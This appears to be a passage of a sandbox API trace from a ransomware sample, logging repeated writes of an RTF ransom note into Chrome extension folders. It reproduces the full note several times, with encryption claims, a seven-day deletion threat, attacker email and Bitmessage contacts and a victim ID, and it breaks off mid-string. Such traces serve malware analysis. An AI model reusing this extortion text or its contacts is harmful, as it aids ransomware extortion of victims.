lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.829] WriteFile (in: hFile=0x284, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.830] CloseHandle (hObject=0x284) returned 1 [0284.830] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\#readme_eman#.rtf")) returned 0x20 [0284.830] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\#readme_eman#.rtf")) returned 0xffffffff [0284.831] GetLastError () returned 0x2 [0284.831] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\am\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0284.831] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.831] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 